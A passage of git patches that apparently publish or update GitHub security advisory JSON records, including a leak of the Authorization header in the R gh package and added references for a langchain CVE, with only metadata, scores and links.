contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8512" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/hk.com.tvb.bigbigshop.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318611" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318611" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619028" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-926" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T14:15:26Z" + } +} \ No newline at end of file From 8527671072933faf8eb0c74fc71c0fb8cf48b743 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 3 Aug 2025 18:34:36 +0000 Subject: [PATCH 322/323] Publish GHSA-gfw5-r5r2-fv73 --- .../GHSA-gfw5-r5r2-fv73.json | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-gfw5-r5r2-fv73/GHSA-gfw5-r5r2-fv73.json diff --git a/advisories/unreviewed/2025/08/GHSA-gfw5-r5r2-fv73/GHSA-gfw5-r5r2-fv73.json b/advisories/unreviewed/2025/08/GHSA-gfw5-r5r2-fv73/GHSA-gfw5-r5r2-fv73.json new file mode 100644 index 0000000000000..6a693c5b93273 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-gfw5-r5r2-fv73/GHSA-gfw5-r5r2-fv73.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfw5-r5r2-fv73", + "modified": "2025-08-03T18:32:49Z", + "published": "2025-08-03T18:32:49Z", + "aliases": [ + "CVE-2025-54956" + ], + "details": "The gh package before 1.5.0 for R delivers an HTTP response in a data structure that includes the Authorization header from the corresponding HTTP request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54956" + }, + { + "type": "WEB", + "url": "https://github.com/r-lib/gh/issues/222" + }, + { + "type": "WEB", + "url": "https://github.com/r-lib/gh/commit/b575d488c71318449cc6c8c989c617db29275848" + }, + { + "type": "WEB", + "url": "https://github.com/r-lib/gh/compare/v1.4.1...v1.5.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-669" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T18:15:25Z" + } +} \ No newline at end of file From 03ba5ef7451e1a718248386880aa2fee54c447a1 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 4 Aug 2025 00:32:08 +0000 Subject: [PATCH 323/323] Publish GHSA-3g6x-vq45-v2jv --- .../07/GHSA-3g6x-vq45-v2jv/GHSA-3g6x-vq45-v2jv.json | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/advisories/unreviewed/2025/07/GHSA-3g6x-vq45-v2jv/GHSA-3g6x-vq45-v2jv.json b/advisories/unreviewed/2025/07/GHSA-3g6x-vq45-v2jv/GHSA-3g6x-vq45-v2jv.json index d7de929537f8c..73b5fca4d0e6c 100644 --- a/advisories/unreviewed/2025/07/GHSA-3g6x-vq45-v2jv/GHSA-3g6x-vq45-v2jv.json +++ b/advisories/unreviewed/2025/07/GHSA-3g6x-vq45-v2jv/GHSA-3g6x-vq45-v2jv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3g6x-vq45-v2jv", - "modified": "2025-07-29T15:31:50Z", + "modified": "2025-08-04T00:30:30Z", "published": "2025-07-29T15:31:50Z", "aliases": [ "CVE-2025-46059" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46059" }, + { + "type": "WEB", + "url": "https://github.com/langchain-ai/langchain-community/issues/217#issuecomment-3144824471" + }, { "type": "WEB", "url": "https://github.com/langchain-ai/langchain/issues/30833" @@ -26,6 +30,10 @@ { "type": "WEB", "url": "https://github.com/Jr61-star/CVEs/blob/main/CVE-2025-46059.md" + }, + { + "type": "WEB", + "url": "https://python.langchain.com/docs/security" } ], "database_specific": { pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy